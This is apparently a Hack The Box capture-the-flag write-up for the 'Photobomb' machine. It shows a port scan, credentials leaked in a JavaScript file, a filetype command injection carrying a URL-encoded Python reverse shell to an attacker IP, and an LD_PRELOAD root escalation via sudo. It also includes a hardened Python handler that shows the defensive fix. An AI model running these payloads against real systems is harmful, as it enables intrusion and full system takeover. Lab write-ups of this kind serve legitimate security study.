HTB box: Photobomb
Box info:
Someone online has already written a ready-made exploit for this box; what I did here is work backwards from that exploit and replay it. With the exploit it goes very fast: bang, 20 minutes and I had pwned the machine.
Information gathering
Port scan:
rustscan -a 10.10.11.182 -- -sC -sV -oN namp

PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 e2:24:73:bb:fb:df:5c:b5:20:b6:68:76:74:8a:b5:8d (RSA)
|   256 04:e3:ac:6e:18:4e:1b:7e:ff:ac:4f:e3:9d:d2:1b:ae (ECDSA)
|_  256 20:e0:5d:8c:ba:71:f0:8c:3a:18:19:f2:40:11:d2:9e (ED25519)
80/tcp open  http    syn-ack nginx 1.18.0 (Ubuntu)
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://photobomb.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
80:
After adding the hosts entry and visiting the site, I found that clicking through requires a login. Inspecting the captured traffic, I found the credentials in a JS file: pH0t0:b0Mb!
After testing, the filetype field turned out to have a command execution vulnerability.
PS: the payload here comes from one I found online: https://github.com/GOATFUCK69/HackTheBox-PhotoBomb-script/blob/main/c.py. I simply pulled the payload out, URL-encoded it and replayed the request.
photo=voicu-apostol-MWER49YaD-M-unsplash.jpg&filetype=jpg;python3%20-c%20'import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%2210.10.14.14%22,4444));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import%20pty;%20pty.spawn(%22/bin/bash%22)'&dimensions=3000x2000
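As an added, defensive example (not the Photobomb application's own code; the converter command line and directories are assumptions): a hardened handler for the same photo/filetype/dimensions parameters, using allowlist checks and an argv-style subprocess call so that a ';' in filetype can never reach a shell.

```python
# Added example, not code from the Photobomb app. The "convert" command line and the
# /srv/photos and /tmp/out directories are assumptions made for illustration.
import re
import subprocess
from pathlib import Path

# Only plain file names: no slashes, spaces or shell metacharacters.
PHOTO_RE = re.compile(r"^[A-Za-z0-9._-]+\.(jpg|png)$")
# Exactly WIDTHxHEIGHT with ASCII digits, e.g. 3000x2000.
DIMS_RE = re.compile(r"^([0-9]{1,5})x([0-9]{1,5})$")
ALLOWED_FILETYPES = {"jpg", "png"}
MAX_SIDE = 10000

class BadRequest(ValueError):
    pass

def check_params(photo, filetype, dimensions):
    """Return the names of the fields that fail validation (empty list = all good)."""
    bad = []
    if not PHOTO_RE.fullmatch(photo):
        bad.append("photo")
    if filetype not in ALLOWED_FILETYPES:      # "jpg;python3 -c ..." is rejected here
        bad.append("filetype")
    m = DIMS_RE.fullmatch(dimensions)
    if not m or not all(0 < int(g) <= MAX_SIDE for g in m.groups()):
        bad.append("dimensions")
    return bad

def build_convert_argv(photo, filetype, dimensions,
                       src_dir="/srv/photos", out_dir="/tmp/out"):
    """Build the converter command as an argument vector, never as a shell string."""
    bad = check_params(photo, filetype, dimensions)
    if bad:
        raise BadRequest("invalid field(s): " + ", ".join(bad))
    out = Path(out_dir) / f"{Path(photo).stem}_{dimensions}.{filetype}"
    return ["convert", str(Path(src_dir) / photo), "-resize", dimensions, str(out)]

def run_convert(photo, filetype, dimensions):
    # shell=False: each argv element goes to execve verbatim, so ';' is never parsed.
    argv = build_convert_argv(photo, filetype, dimensions)
    return subprocess.run(argv, check=True, shell=False)
```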
Privilege escalation
The shell obtained here runs with user privileges. Running sudo -l
shows the privilege escalation point directly: an ordinary environment-variable hijack. Reference:
https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-command-suid-binary-without-command-path
Here I just copied this:
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>   /* setgid/setuid */

/* Runs when the shared object is loaded via LD_PRELOAD. */
void _init() {
    unsetenv("LD_PRELOAD");   /* do not preload into the child shell */
    setgid(0);
    setuid(0);
    system("/usr/bin/bash");
}
gcc -fPIC -shared -o shell.so shell.c -nostartfiles

sudo LD_PRELOAD=/home/wizard/shell.so /opt/cleanup.sh

Summary
The payload leaked on GitHub for this box saved me the vulnerability testing, though looking at the captured request one would suspect command execution anyway. The privilege escalation part was easy. Overall a simple box.